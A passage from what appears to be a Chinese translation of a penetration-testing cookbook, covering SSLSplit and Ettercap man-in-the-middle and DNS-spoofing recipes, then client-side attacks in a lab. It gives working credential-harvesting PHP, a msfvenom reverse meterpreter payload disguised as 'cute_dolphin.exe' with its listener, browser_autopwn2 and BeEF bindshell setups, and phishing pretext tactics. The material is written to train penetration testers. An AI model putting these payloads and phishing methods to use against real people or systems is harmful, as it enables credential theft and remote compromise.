337 |     mkdir /tmp/sslsplit/logdir
338 |     ```
339 |     
340 | 2.  现在，让我们启动 SSLSplit：
341 | 
342 |     ```
343 |     sslsplit -D -l connections.log -j /tmp/sslsplit -S logdir -k certauth.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
344 |     ```
345 |     
346 |     ![](img/8-5-1.jpg)
347 |     
348 | 3.  现在，SSLSplit 正在运行，Windows 客户端和 vulnerable_vm 之间存在 MITM，来到客户端并访问` https://192.168.56.102/dvwa/`。
349 | 
350 | 4.  浏览器会要求确认，因为我们的 CA 和证书并不是被任何浏览器官方承认的。设置例外并继续。
351 | 
352 |     ![](img/8-5-2.jpg)
353 |     
354 | 5.  现在登录 DVWA ，使用管理员用户和密码。
355 | 
356 | 6.  让我们看看 SSLSplit 中发生了什么。打开新的终端并检查日志内容，在我们为 SSLSplit 创建的目录中：
357 | 
358 |     ```
359 |     ls /tmp/sslsplit/logdir/ 
360 |     cat /tmp/sslsplit/logdir/*
361 |     ```
362 |     
363 |     ![](img/8-5-3.jpg)
364 |     
365 | 现在，即使 Ettercap 和 Wireshark 只能看到加密数据，我么也可以以纯文本在 SSLSplit 中查看通信。
366 | 
367 | ### 工作原理
368 | 
369 | 这个秘籍中，我们继续 SSL 连接上的攻击。在第一步中，我们创建了目录，其中 SSLSplit 会将捕获到的信息存在里面。
370 | 
371 | 第二部就是使用下列命令执行 SSLSplit：
372 | 
373 | +   `-D`：这是在前台运行 SSLSplit，并不是守护进程，并带有详细的输出。
374 | 
375 | +   `-l connections.log`：这将每个连接的记录保存到当前目录的` connections.log`中。
376 | 
377 | +   `-j /tmp/sslsplit`：这用于建立`jail directory`目录，`/tmp/sslsplit`会作为 root（`chroot`）包含 SSLSplit 的环境。
378 | 
379 | +   `-S logdir`：这用于告诉 SSLSplit 将内容日志（所有请求和响应）保存到`logdir`（在jail目录中），并将数据保存到单独的文件中。
380 | 
381 | +   `-k`和`-c`：这用于指明和充当 CA 时，SSLSplit 所使用的私钥和证书。
382 | 
383 | +   `ssl 0.0.0.0 8443`：这告诉 SSLSplit 在哪里监听 HTTPS（或者其它加密协议）连接。要记住这是我们在上一章中使用 iptables 从 443 转发的接口。
384 | 
385 | +   `tcp 0.0.0.0 8080`：这告诉 SSLSplit 在哪里监听 HTTP 连接。要记住这是我们在上一章中使用 iptables 从 80 转发的接口。
386 | 
387 | 在执行这些命令之后，我们等待客户端浏览器服务器的 HTTPS 页面并提交数据，之后我们检查日志文件来发现未加密的信息。
388 | 
389 | ## 8.6 执行 DNS 欺骗并重定向流量
390 | 
391 | DNS 欺骗是一种攻击，其中执行 MITM 攻击的攻击者使用它来修改响应受害者的 DNS 服务器中的名称解析，发送给他们恶意页面，而不是他们请求的页面，但仍然使用有效名称。
392 | 
393 | 这个秘籍中，我们会使用 Ettercap 来执行 DNS 欺骗攻击，并在受害者打算浏览别的网站时，使其浏览我们的网站。
394 | 
395 | ### 准备
396 | 
397 | 对于这个秘籍，我们需要使用我们的 WIndows 客户端虚拟机，但是这次网络识别器桥接到 DNS 解析中。这个秘籍中它的 IP 地址为 192.168.71.14。
398 | 
399 | 攻击者的机器是我们的 Kali 主机，IP 为  192.168.71.8。它也需要运行 Apache 服务器，并拥有`index.html`演示页面，我们会包含下列东西：
400 | 
401 | ```html
402 | <h1>Spoofed SITE</h1>
403 | ```
404 | 
405 | ### 操作步骤
406 | 
407 | 1.  假设我们已经启动了 Apache 服务器，并正确配置了伪造页面，让我们编辑`/etc/ettercap/etter.dns`，使它仅仅包含下面这一行：
408 | 
409 |     ```
410 |     * A 192.168.71.8 
411 |     ```
412 |     
413 |     我们仅仅设置一条规则：所有 A 记录（地址记录）都解析到`192.168.71.8`，这是我们 Kali 的地址。我们可以设置其他条目，但是我们打算在这里避免干扰。
414 |     
415 | 2.  这次，我们从命令行运行 Ettercap。打开 root 终端并键入下列命令：
416 | 
417 |     ```
418 |     ettercap -i wlan0 -T -P dns_spoof -M arp /192.168.71.14///
419 |     ```
420 |     
421 |     它会以文本模式运行 Ettercap，并开启 DNS 欺骗插件来执行 ARP 欺骗攻击，目标仅仅设置为`192.168.71.14`。
422 |     
423 |     ![](img/8-6-1.jpg)
424 |     
425 | 3.  启动攻击之后，我们来到客户端主机，并尝试通过网站自己的域名来浏览网站，例如，` www.yahoo.com`，像这样：
426 | 
427 |     ![](img/8-6-2.jpg)
428 |     
429 |     要注意，现在地址和标签栏显示原始站点的名称，但是内容来自不同的地方。
430 |     
431 | 4.  我们也可以尝试使用`nslookup`执行地址解析，像这样：
432 | 
433 |     ![](img/8-6-3.jpg)
434 |     
435 | ### 工作原理
436 | 
437 | 这个秘籍中，我们看到如何使用中间人攻击来强制用户浏览某个页面，他们甚至相信自己在其它站点上。
438 | 
439 | 在第一步中，我们修改了 Ettercap 的名称解析文件，让它将所有请求的名称重定向到我们的 Kali 主机。
440 | 
441 | 之后，我们以下列参数运行 Ettercap：`-i wlan0 -T -P dns_spoof -M arp /192.168.71.14///`。
442 | 
443 | +   `-i wlan0`：要技术我们需要客户端进行 DNS 解析，所以我们需要让它连接到桥接的适配器，并到达我们的 Kali 主机，所以我们将嗅探接口设为`wlan0`（攻击者计算机上的无线网卡）。
444 | 
445 | +   `-T`：使用纯文本界面。
446 | 
447 | +   `-P dns_spoof`：启动 DNS 欺骗插件。
448 | 
449 | +   `-M arp`：执行 ARP 欺骗攻击。
450 | 
451 | +   `/192.168.71.14///`：这是我们在命令行中对 Ettercap 设置目标的方式：`MAC/ip_address/port`。其中`//`表示任何对应 IP 192.168.71.14（客户端）任何端口的 MAC 地址。
452 | 
453 | 最后，我们确认了攻击能够正常工作。
454 | 
455 | ### 另见
456 | 
457 | 也有另一个非常实用的用于这些类型攻击的工具，叫做 dnsspoof。你应该下载下来并加入工具库：
458 | 
459 | ```
460 | man dnsspoof
461 | ```
462 | 
463 | http://www.monkey.org/~dugsong/dsniff/
464 | 
465 | 另一个值得提及的工具是中间人攻击框架：MITMf。它包含内建的 ARP 毒化、DNS 欺骗、WPAD 代理服务器，以及其它攻击类型的功能。
466 | 
467 | ```
468 | mitmf --help
469 | ```
470 | 


--------------------------------------------------------------------------------
/ch9.md:
--------------------------------------------------------------------------------
  1 | # 第九章 客户端攻击和社会工程
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 我们目前所见的大部分技巧都尝试利用服务端的漏洞或设计缺陷，并访问它来从数据库中提取信息。有另外一种攻击，使用服务器来利用用户软件上的漏洞，或者尝试欺骗用户来做一些他们通常情况下不会做的事情，以便获得用户拥有的信息。这些攻击就叫做客户端攻击。
 12 | 
 13 | 这一章中，我们会复查一些由攻击者使用，用于从客户端获得信息的技巧，通过社会工程、欺骗或利用软件漏洞。
 14 | 
 15 | 虽然它并不和 Web 应用渗透测试特定相关，我们会涉及它们，因为大多数都是基于 web 的，并且都是非常常见的场景，其中我们在攻击客户端时，能够访问应用和服务器。所以，了解攻击者如何执行这类攻击，对于渗透测试者来说非常重要。
 16 | 
 17 | ## 9.1 使用 SET 创建密码收集器
 18 | 
 19 | 社会工程攻击可能被认为是客户端攻击的特殊形式。在这种攻击中，攻击者需要说服用户，相信攻击者是可信任的副本，并且有权接收用户拥有的一些信息。
 20 | 
 21 | SET 或社会工程工具包（`https://www.trustedsec.com/social-engineertoolkit/`）是一套工具，为执行针对人性的攻击而设计。这类攻击，包括网络钓鱼、邮件群发、SMS、伪造无线接入点、恶意网站、感染性媒体，以及其它。
 22 | 
 23 | 这个秘籍中，我们会使用 SET 来创建密码收集器网页，并看看它如何工作，以及攻击者如何使用它来盗取用户密码。
 24 | 
 25 | ### 操作步骤
 26 | 
 27 | 1.  在 root 终端中输入下列命令：
 28 | 
 29 |     ```
 30 |     setoolkit
 31 |     ```
 32 |     
 33 |     ![](img/9-1-1.jpg)
 34 |     
 35 | 2.  在`set>`提示符中输入`1`（`Social-Engineering Attacks`）并按下回车。
 36 | 
 37 | 3.  现在选择`Website Attack Vectors`（选项`2`）。
 38 | 
 39 | 4.  从下面的菜单中，我们选择`Credential Harvester Attack Method`（选项`3`）。
 40 | 
 41 | 5.  选择`Site Cloner `（选项`2`）。
 42 | 
 43 | 6.  它会询问`IP address for the POST back in Harvester/Tabnabbing`。它的意思是收集到的证书打算发送到哪个 IP。这里，我们输入 Kali 主机在`vboxnet0`中的 IP `192.168.56.1`。
 44 | 
 45 | 7.  下面，压脚询问要克隆的 URL，我们会从 vulnerable_vm 中克隆 Peruggia 的登录表单。输入` http://192.168.56.102/peruggia/index. php?action=login`。
 46 | 
 47 | 8.  现在会开始克隆，之后你会被询问是否 SET 要开启 Apache 服务器，让我们这次选择`Yes`，输入`y`并按下回车。
 48 | 
 49 |     ![](img/9-1-2.jpg)
 50 |     
 51 | 9.  再次按下回车。
 52 | 
 53 | 0.  让我们测试一下页面，访问` http://192.168.56.1/`。
 54 | 
 55 |     ![](img/9-1-3.jpg)
 56 |     
 57 |     现在我们拥有原始登录页面的一份精确副本。
 58 |     
 59 | 1.  现在在里面输入一些用户名和密码，并点击`Login`。我们要尝试`harvester/test`。
 60 | 
 61 | 2.  你会看到页面重定向到了原始的登录页面。现在，来到终端并输入收集器文件保存的目录，默认为 Kali 中的`/var/www/ html`：
 62 | 
 63 |     ```
 64 |     cd /var/www/html
 65 |     ```
 66 |     
 67 | 3.  这里应该有名称为`harvester_{date and time}.txt `的文件。
 68 | 
 69 | 4.  显示它的内容，我们会看到所有捕获的信息：
 70 | 
 71 |     ```
 72 |     cat harvester_2015-11-22 23:16:24.182192.txt
 73 |     ```
 74 |     
 75 |     ![](img/9-1-4.jpg)
 76 |     
 77 |     这就结束了，我们仅仅需要将连接发送给我们的目标，并让他们访问我们的伪造登录页面，来收集它们的密码。
 78 |     
 79 | ### 工作原理
 80 | 
 81 | SET 在克隆站点的时候会创建三个文件：首先是`index.html`，这是原始页面的副本，并包含登录表单。如果我们查看 SET 在我们的 Kali 中的 `/var/www/html `创建的`index.html`的代码，我们会发现下面的代码：
 82 | 
 83 | ```html
 84 | <form action="http://192.168.56.1/post.php" method=post> 
 85 | <br> 
 86 | Username: <input type=text name=username><br> 
 87 | Password: <input type=password name=password><br> 
 88 | <br><input type=submit value=Login><br> 
 89 | </form>
 90 | ```
 91 | 
 92 | 这里我们可以看到用户名和密码都发给了 192.168.56.1 （我们的 Kali 主机）的`post.php`，这是 SET 创建的第二个文件。这个文件所做的所有事情就是读取 POST 请求的内容并将它们写入`harvester_{date and time}.txt `文件。 SET 所创建的第三个文件储存由用户提交的信息。在向文件中写入数据之后，`<meta>`标签重定向到原始的登录页面，所以用户会认为他们输入了一些不正确的用户名或密码：
 93 | 
 94 | ```php
 95 | <?php 
 96 | $file = 'harvester_2015-11-22 23:16:24.182192.txt'; 
 97 | file_put_contents($file, print_r($_POST, true), FILE_APPEND); 
 98 | ?> 
 99 | <meta http-equiv="refresh" content="0; 
100 | url=http://192.168.56.102/peruggia/index.php?action=login" 
101 | />
102 | ```
103 | 
104 | ## 9.2 使用之前保存的页面来创建钓鱼网站
105 | 
106 | 在之前的秘籍中，我们使用了 SET 来复制网站并使用它来收集密码。有时候，仅仅复制登录页面不会对高级用户生效，在正确输入密码并再次重定向登录页面时，它们可能会产生怀疑，或者会试着浏览页面中的其它链接。我们这样就会失去它们，因为它们会离开我们的页面而来到原始站点。
107 | 
108 | 这个秘籍中，我们会使用我们在第三章“为 Wget 离线分析下载页面”秘籍中复制的页面，来构建更加详细的钓鱼网站，因为它几乎含有所有导航，并且会在捕获证书之后登陆原始站点。
109 | 
110 | ### 准备
111 | 
112 | 我们需要保存 Web 页面，遵循第三章“为 Wget 离线分析下载页面”秘籍。简单来说，可以通过下列命令来完成：
113 | 
114 | ```
115 | wget -r -P bodgeit_offline/ http://192.168.56.102/bodgeit/ 
116 | ```
117 | 
118 | 之后，离线页面会储存在`bodgeit_offline `目录中。
119 | 
120 | ### 操作步骤
121 | 
122 | 1.  第一步是将下载的站点复制到 Kali 中 APache 的根目录。在 root 终端中：
123 | 
124 |     ```
125 |     cp -r bodgeit_offline/192.168.56.102/bodgeit /var/www/html/ 
126 |     ```
127 |     
128 | 2.  之后我们启动 Apache 服务：
129 | 
130 |     ```
131 |     service apache2 start 
132 |     ```
133 |     
134 | 3.  下面，我们需要更新我们的登录页面，使它重定向我们收集密码的脚本。打开`bodgeit `目录（`/ var/www/html/bodgeit`）中的`login.jsp`文件，并寻找下面的代码：
135 | 
136 |     ```html
137 |     <h3>Login</h3> 
138 |     Please enter your credentials: <br/><br/> 
139 |     <form method="POST">
140 |     ```
141 |     
142 | 4.  现在，在表单标签中添加`action`来调用`post.php`：
143 | 
144 |     ```html
145 |     <form method="POST" action="post.php">
146 |     ```
147 |     
148 | 5.  我们需要在` login.jsp `的相同目录下创建该文件，创建`post.php`，带有下列代码：
149 | 
150 |     ```php
151 |     <?php  
152 |     $file = 'passwords_C00kb00k.txt';  
153 |     file_put_contents($file, print_r($_POST, true), FILE_APPEND);  
154 |     $username=$_POST["username"];  
155 |     $password=$_POST["password"];  
156 |     $submit="Login"; ?> 
157 |     <body onload="frm1.submit.click()"> 
158 |     <form name="frm1" id="frm1" method="POST" 
159 |     action="http://192.168.56.102/bodgeit/login.jsp"> 
160 |     <input type="hidden" value="<?php echo $username;?>" name ="username"> 
161 |     <input type="hidden" value="<?php echo $password;?>" name ="password"> 
162 |     <input type="submit" value="<?php echo $submit;?>" name ="submit"> 
163 |     </form> 
164 |     </body>
165 |     ```
166 |     
167 | 6.  你可以看到，密码会保存到` passwords_C00kb00k.txt`。我们需要创建这个文件来设置合理的权限。在 root 终端中访问`/var/www/html/bodgeit `，并输入下列命令：
168 | 
169 |     ```
170 |     touch passwords_C00kb00k.txt 
171 |     chown www-data passwords_C00kb00k.txt
172 |     ```
173 |     
174 |     要记住 Web 服务器运行在 www-data 用户下，所以我们需要使这个用户为文件的所有者，便于它可被 web 服务器进程写入。
175 |     
176 | 7.  现在，是时候让受害者访问这个站点了，假设我们让用户访问了`http://192.168.56.1/bodgeit/login.jsp`，打开浏览器并访问它。
177 | 
178 | 8.  使用一些有效用户信息填充登录表单，对于这个秘籍我们会使用`user@ mail.com/password`。
179 | 
180 | 9.  点击`Login`。
181 |     
182 |     ![](img/9-2-1.jpg)
183 |     
184 |     它看起来能正常工作，我们现在成功登录了` 192.168.56.102`。
185 |     
186 | 0.  让我们检查密码文件，在终端中输入：
187 | 
188 |     ```
189 |     cat passwords_C00kb00k.txt
190 |     ```
191 |     
192 |     ![](img/9-2-2.jpg)
193 |     
194 |     并且，我们得到它了。我们捕获了用户的密码，将它们重定向到正常页面并执行了登录。
195 |     
196 | ### 工作原理
197 | 
198 | 这个秘籍中，我们使用了站点副本来创建密码收集器，并使它更加可信，我们使脚本执行原始站点的登录。
199 | 
200 | 在前三步中，我们简单设置了 Web 服务器和它要展示的文件。下面，我们创建了密码收集器脚本`post.php`：前两行和之前的秘籍相同，它接受所有 POST 参数并保存到文件中。
201 | 
202 | ```php
203 | $file = 'passwords_C00kb00k.txt';  
204 | file_put_contents($file, print_r($_POST, true), FILE_APPEND);
205 | ```
206 | 
207 | 之后我们将每个参数储存到变量中：
208 | 
209 | ```php
210 | $username=$_POST["username"];  
211 | $password=$_POST["password"];  
212 | $submit="Login";
213 | ```
214 | 
215 | 因为我们的登录不打算依赖于用户发送的正确值，我们设置`$submit="Login"`。下面，我们创建了 HTML 主题，它包含一个表单，在页面加载完毕后会自动发送`username`，`password`和`submit`值到原始站点。
216 | 
217 | ```php
218 | <body onload="frm1.submit.click()"> 
219 | <form name="frm1" id="frm1" method="POST" 
220 | action="http://192.168.56.102/bodgeit/login.jsp"> 
221 | <input type="hidden" value="<?php echo $username;?>" name ="username"> 
222 | <input type="hidden" value="<?php echo $password;?>" name ="password"> 
223 | <input type="submit" value="<?php echo $submit;?>" name ="submit"> 
224 | </form> 
225 | </body>
226 | ```
227 | 
228 | 要注意，`body `中的`onload`事件并不调用`frm1.submit() `而是` frm1.submit. click()`。这是因为当我们使用`submit`作为表单元素的名称时，表单中的`submit()`函数会被这个元素覆盖掉（这里是提交按钮）。我们并不打算修改按钮名称，因为它是原始站点需要的名称。所以我们使`submit`变成一个按钮，而不是隐藏字段，并使用它的`click`函数将值提交到原始站点。我们同时将表单中的字段值设置为我们之前用于储存用户数据的变量值。
229 | 
230 | ## 9.3 使用 Metasploit 创建反向 shell 并捕获连接
231 | 
232 | 当我们执行客户端攻击的时候，我们能够欺骗用户来执行程序，并使这些程序连接回控制端。
233 | 
234 | 这个秘籍中，我们会了解如何使用 Metasploit 的 msfvenom 来创建可执行程序（反向 meterpreter shell），它会在执行时连接我们的 Kali 主机，并向我们提供用户计算机的控制。
235 | 
236 | ### 操作步骤
237 | 
238 | 1.  首先，我们要创建我们的 shell。在 Kali 中打开终端并执行下列命令：
239 | 
240 |     ```
241 |     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4443 -f exe > cute_dolphin.exe
242 |     ```
243 |     
244 |     这会创建名为`cute_dolphin.exe`的文件，这是反向 meterpreter shell，反向意味着它会连接回我们，而不是监听我们的连接。
245 |     
246 | 2.  下面，我们需要为我们“可爱的海豚”将要创建的连接建立监听器。在 MSFconsole 的终端中：
247 | 
248 |     ```
249 |     use exploit/multi/handler 
250 |     set payload windows/meterpreter/reverse_tcp 
251 |     set lhost 192.168.56.1 set lport 4443 
252 |     set ExitOnSession false 
253 |     set AutorunScript post/windows/manage/smart_migrate 
254 |     exploit -j -z 
255 |     ```
256 |     
257 |     就像你看到的那样，LHOST 和 RPORT 是我们用于创建`exe`文件的东西。这是程序将要连接的 IP 地址和 TCP 端口。所以我们需要在这个 Kali 的网络接口和端口上监听。
258 |     
259 | 3.  我们的 Kali 已准备就绪，现在是准备攻击用户的时候了，我们以 root 启动 Apache 服务并运行下列代码：
260 | 
261 |     ```
262 |     service apache2 start
263 |     ```
264 |     
265 | 4.  之后，将恶意文件复制到 web 服务器文件夹内。
266 | 
267 |     ```
268 |     cp cute_dolphin.exe /var/www/html/
269 |     ```
270 |     
271 | 5.  假设我们使用社会工程并使我们的受害者相信这个文件是需要执行来获得一些好处的东西。在 Windows 客户端虚拟机内，访问` http://192.168.56.1/cute_dolphin.exe`。
272 | 
273 | 6.  你会被询问下载还是运行这个文件，出于测试目的，选择`Run`（运行），再被询问时，再次选择`Run`。
274 | 
275 | 7.  现在，在 Kali MSFCONSOLE 的终端中，你会看到建立好的连接：
276 | 
277 |     ![](img/9-3-1.jpg)
278 | 
279 | 8.  我们在后台运行连接处理器（`-j -z`选项）。让我们检查我们的活动会话：
280 | 
281 |     ```
282 |     sessions
283 |     ```
284 |     
285 |     ![](img/9-3-2.jpg)
286 |     
287 | 9.  如果我们打算和会话交互，可以使用`-i`选项，带有会话的编号：
288 | 
289 |     ```
290 |     sessions -i 1 
291 |     ```
292 |     
293 | 0.  我们会看到 meterpreter 的提示符。现在，我们可以请求被入侵系统的信息。
294 | 
295 |     ```
296 |     sysinfo
297 |     ```
298 |     
299 |     ![](img/9-3-3.jpg)
300 |     
301 | 1.  或者执行系统 shell。
302 | 
303 |     ```
304 |     shell
305 |     ```
306 |     
307 |     ![](img/9-3-4.jpg)
308 | 
309 | ### 工作原理
310 | 
311 | Msfvenom 帮助的我们从 Metasploit 大量列表中创建载荷，并且将它们集成到许多语言的源代码中，或者创建脚本和可执行文件。就像我们在这个秘籍所做的那样。我们这里所使用的参数是所使用的载荷（`windows/ meterpreter/reverse_tcp`）、连接回来所需的主机和端口（LHOST 和 RPORT），以及输出格式（`-f exe`）。将标准输出重定向到文件来将它保存为` cute_dolphin.exe`。
312 | 
313 | Metasploit 的 exploit/multi/handler 是个载荷处理器，这里我们将其用于监听连接。在连接建立之后，它执行了 meterpreter 载荷。
314 | 
315 | Meterpreter 是增强型的 Metasploit shell。它包含用于嗅探受害者网络，用于将其作为入口来访问本地网络，或者用于执行权限提升和密码提取的模块，以及其它渗透测试中的实用工具。
316 | 
317 | ## 9.4 使用 Metasploit 的 browser_autpwn2 攻击客户端
318 | 
319 | Metasploit 框架包含客户端利用的庞大集合，许多都为利用浏览器中的已知漏洞而设计。其中有一个模块能够检测客户端所使用的浏览器版本，并挑选最好的利用工具来触发漏洞。这个模块是 browser_autpwn 和 browser_autpwn2，后者是最新版本。
320 | 
321 | 在这个秘籍中，我们会使用 browser_autpwn2 执行攻击，并将其配置好来让目标访问。
322 | 
323 | ### 操作步骤
324 | 
325 | 1.  启动 MSFCONSOLE。
326 | 
327 | 2.  我们会使用 browser_autpwn2 （BAP2）。
328 | 
329 |     ```
330 |     use auxiliary/server/browser_autopwn2 
331 |     ```
332 | 
333 | 3.  让我们看一看它拥有什么配置项。
334 | 
335 |     ```
336 |     show options
337 |     ```
338 |     
339 |     ![](img/9-4-1.jpg)
340 |     
341 | 4.  我们将 Kali 设为接受连接的主机。
342 | 
343 |     ```
344 |     set SRVHOST 192.168.56.1
345 |     ```
346 |     
347 | 5.  之后，我们为接受响应的服务器创建目录`/kittens`。
348 | 
349 |     ```
350 |     set URIPATH /kittens
351 |     ```
352 |     
353 | 6.  这个模块会触发大量利用，包含一些 Android 上的。假设我们的攻击目标是 PC，并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
354 | 
355 |     ```
356 |     set EXCLUDE_PATTERN android|adobe_flash
357 |     ```
358 |     
359 | 7.  我们也可以设置模块的高级选项（使用`show advanced`来查看高级选项的完整列表），来向我们展示每个加载的利用的独立路径，并且更加详细。
360 | 
361 |     ```
362 |     set ShowExploitList true 
363 |     set VERBOSE true
364 |     ```
365 |     
366 |     高级选项也允许我们为每个平台（Windows、Unix 和 Android）选择载荷和它的参数，例如 LHOST 和 RPORT。
367 |     
368 | 8.  现在，我们已经为执行利用做好了准备。
369 | 
370 |     ```
371 |     run
372 |     ```
373 |     
374 |     ![](img/9-4-2.jpg)
375 |     
376 |     如果我们打算触发特定的利用，我们可以在服务器的 URL 后面使用`Path`值。例如，如果我们打算触发`firefox_svg_plugin`，我们将`http://192.168.56.1/PWrmfJApkwWsf`发送给受害者，路径在每次模块运行时会随机生成。
377 |     
378 | 9.  在客户端的浏览器中，如果我们访问` http://192.168.56.1/kittens`，我们会看到 BAP2 立即响应，并且尝试所有合适的利用，当它成功执行某个之后，它会在后台创建会话：
379 | 
380 |     ![](img/9-4-3.jpg)
381 |     
382 | ### 工作原理
383 | 
384 | Browser Autopwn 会建立带有主页的 Web 服务器，并使用 JavaScript 来识别客户端运行了什么软件，并基于它选择合适的利用来尝试。
385 | 
386 | 这个秘籍中，我们设置了 Kali 主机，使其为`kittens`目录的请求监听 8080 端口。我们所配置的其它请求是：
387 | 
388 | +   `EXCLUDE_PATTERN`：告诉 BAP2 排除（不加载） Android 浏览器或 Flash 插件的利用。
389 | 
390 | +   `ShowExploitList`：展示 BAP2 运行时已加载的利用。
391 | 
392 | +   `VERBOSE`：告诉 BPA2 显示更多信息，关于加载了什么，加载到哪里，每一步都发生了什么。
393 | 
394 | 之后，我们只需要运行模块并使一些用户访问我们的`/kittens `站点。
395 | 
396 | ## 9.5 使用 BeEF 攻击
397 | 
398 | 在之前的章节中，我们看到了 BeEF（浏览器利用框架）能够做什么。这个秘籍中，我们会使用它来发送而已浏览器扩展，当它执行时，会向我们提供绑定到系统的远程 shell。
399 | 
400 | ### 准备
401 | 
402 | 我们需要为这个秘籍在 Windows 客户端安装 Firefox。
403 | 
404 | ### 操作步骤
405 | 
406 | 1.  开启 BeEF 服务。在 root 终端下，输入下列命令：
407 | 
408 |     ```
409 |     cd /usr/share/beef-xss/ 
410 |     ./beef
411 |     ```
412 |     
413 | 2.  我们会使用 BeEF 的高级演示页面来勾住我们的客户端。在 Windows 客户端 VM 中，打开 FIrefox 并浏览`http://192.168.56.1:3000/demos/butcher/index.html`。
414 | 
415 | 3.  现在，登录 BeEF 的面板（`http://127.0.0.1:3000/ui/panel`）。我们必须在这里查看新勾住的浏览器。
416 | 
417 |     ![](img/9-5-1.jpg)
418 |     
419 | 4.  选项被勾住的 FIrefox 并访问` Current Browser | Commands | Social Engineering | Firefox Extension (Bindshell)`。
420 | 
421 |     ![](img/9-5-2.jpg)
422 |     
423 |     由于它被标为橙色（命令模块对目标工作，但是可能对用户可见），我们可能需要利用社会工程来使用户接受扩展。
424 |     
425 | 5.  我们需要发送叫做`HTML5 Rendering Enhancements`的扩展给用户，它会通过 1337 端口打开 shell。点击`Execute`来加载攻击。
426 | 
427 | 6.  在客户端，Firefox 会询问许可来安装插件并接受它。
428 | 
429 | 7.  之后，如果 Windows 防火墙打开了，它会询问许可来让插件访问网络，选择`Allow access `。
430 | 
431 |     ![](img/9-5-3.jpg)
432 |     
433 |     最后两个步骤高度依赖于社会工程，说服用户信任这个插件值得安装和授权。
434 |     
435 | 8.  现在，我们应该拥有了等待连接 1337 端口的的客户端。在 Kali 中打开终端并连接到它（我们这里是 192.168.56.102）。
436 | 
437 |     ```
438 |     nc 192.168.56.102 1337
439 |     ```
440 |     
441 |     ![](img/9-5-4.jpg)
442 |     
443 |     现在我们就连接到了客户端并能够在里面执行命令。
444 |     
445 | ### 工作原理
446 | 
447 | 一旦客户端被 BeEF 勾住，它就会像浏览器发送请求（通过`hook.js`）来下载扩展。一旦下载完成，就取决于用户是否安装。
448 | 
449 | 像之前所说的那样，这个攻击高度依赖用户来完成关键步骤，这取决于我们通过社会工程手段说服用户，使之相信必须安装扩展。这可以通过页面上的文本来完成，比如说解锁一些浏览器的实用功能非常必要。
450 | 
451 | 在用户安装扩展之后，我们只需要使用 Netcat 来连接端口 1337，并开始执行命令。
452 | 
453 | ## 9.6 诱使用户访问我们的仿造站点
454 | 
455 | 每次社会工程攻击的成功依赖于攻击者说服用户的能力，以及用户遵循攻击者指令的意愿。这个秘籍是一系列攻击者所使用的情景和技巧，用于利用它们的优势使用户更加信任并抓住它们。
456 | 
457 | 这一节中，我们会看到一些在前面那些安全评估中能够生效的攻击。它们针对拥有一定等级的安全意识，并且不会陷入“银行账户更新”骗局的用户。
458 | 
459 | 1.  做你自己的作业：如果是个钓鱼攻击，做一次关于目标的彻底调查：社会网络、论坛、博客、以及任何能够告诉你目标信息的信息员。Maltego 包含在 Kali 中，可能是用于这个任务的最佳工具。之后基于这些编造一个借口（伪造的故事）或者一个攻击主题。
460 | 
461 |     我们发现了一些客户的雇员，他们在 Facebook 主页上发送大量图片、视频和文本。我们从她的页面上收集了一些内容并构建了幻灯片演示，它也包含客户电脑的远程执行利用，我们将它通过邮件发送她。
462 | 
463 | 2.  创建争论：如果目标是个某领域中的意见领袖，使用他自己的名言，使它们对你说的东西感兴趣，这也会有帮助。
464 | 
465 |     我们被雇佣来执行某个金融公司的渗透测试，协约条款包括了社会工程。我们的目标是个经济和金融圈内的知名人士。他在知名的杂志上撰稿，做讲座，出现在经济新闻上，以及其它。我们的团队做了一些关于他的研究，并从经济杂志的网站上获得了一篇文章。这篇文章包含他的公司（我们的客户）的电子邮件。我们寻找了关于文章的更多信息，并发现其它站点上的一些评论和引用。我们利用这些杜撰了一个电子邮件，说我们有一些关于文章的评论，在消息中给出摘要，并使用短链接来链接到 Google Drive 的一个文档上。
466 |     
467 |     短链接让用户访问伪造的 Google 登录页面，它由我们控制，并允许我们获取他同事的邮件和密码。
468 |     
469 | 3.  说出你是谁：好吧，这并不准确。如果你说“我是个安全研究员，在你的系统中发现了一些东西”，可能对于开发者和系统管理员是个很好的钩子。
470 | 
471 |     在其它场景中，我们需要明确公司中的社会工程师和系统管理员。首先，我们不能在网上发现任何关于他的有用信息，但是可以在公司的网站上发现一些漏洞。我们使用它来向我们的目标发送邮件，并说我们在公司的服务器上发现了一些重要的漏洞，我们可以帮你修复它们，附上一张图作为证据，以及Google Drive 文档的链接（另一个伪造登录页面）。
472 |     
473 | 4.  固执与逼迫：有时候你不会在首次尝试的时候就收到答复，这时总是要分析结果 -- 目标是否点击了链接，目标是否提交了伪造信息，以及判断是否要做出第二次尝试。
474 | 
475 |     我们没有从系统管理员那里收到该场景的答复，页面也没有人浏览。所以我们发送第二个邮件，带有 PDF “完整报告”，并说如果我们没有收到答复，就公布漏洞。于是我们收到了答复。
476 |     
477 | 5.  使你自己更加可信：尝试接受一些你模仿的人的修辞，并提供一些真实信息。如果你向公司发送邮件，使用公司的 Logo，为你的伪造站点获得一个免费的`.tk`或`.co.nf`域名，花费一些时间来设计或正确复制目标站点，以及其它。
478 | 
479 |     盗取信用卡数据的人所使用的技巧非常通用，它们使用信用卡号码的一部分，后面带有星号，发送“你需要更新你的信息”邮件（的变体）。
480 | 
481 |     正常信息会这样写：“你的信用卡 `**** **** **** 3241` 的信息”，但是伪造信息会这样写：“你的信用卡 `4916 **** **** ****` 的信息”。要知道前四位（4916）是 Visa 信用卡的标准。
482 |     
483 | ### 工作原理
484 | 
485 | 让一个人打开来自完全陌生的人的邮件，阅读它，并点击它包含的链接，以及提供页面上的所需信息，在尼日利亚王子诈骗横行的今天，可能是一件非常困难的事情。成功社会工程攻击的关键是创造一种感觉，让受害者觉得攻击者在为它做一些好事或必要的事情，也要创造一种急迫感，即用户必须快速回复否则会丢失重要的机会。
486 | 
487 | ### 更多
488 | 
489 | 客户端攻击也可以用于被入侵服务器上的提权。如果你获得了服务器的访问，但是没有继续行动的空间，你可能需要在你的攻击主机上开启而已服务器，并在目标上浏览它。所以你可以利用其它类型的漏洞，并执行特权命令。
490 | 


--------------------------------------------------------------------------------
/cover.jpg:
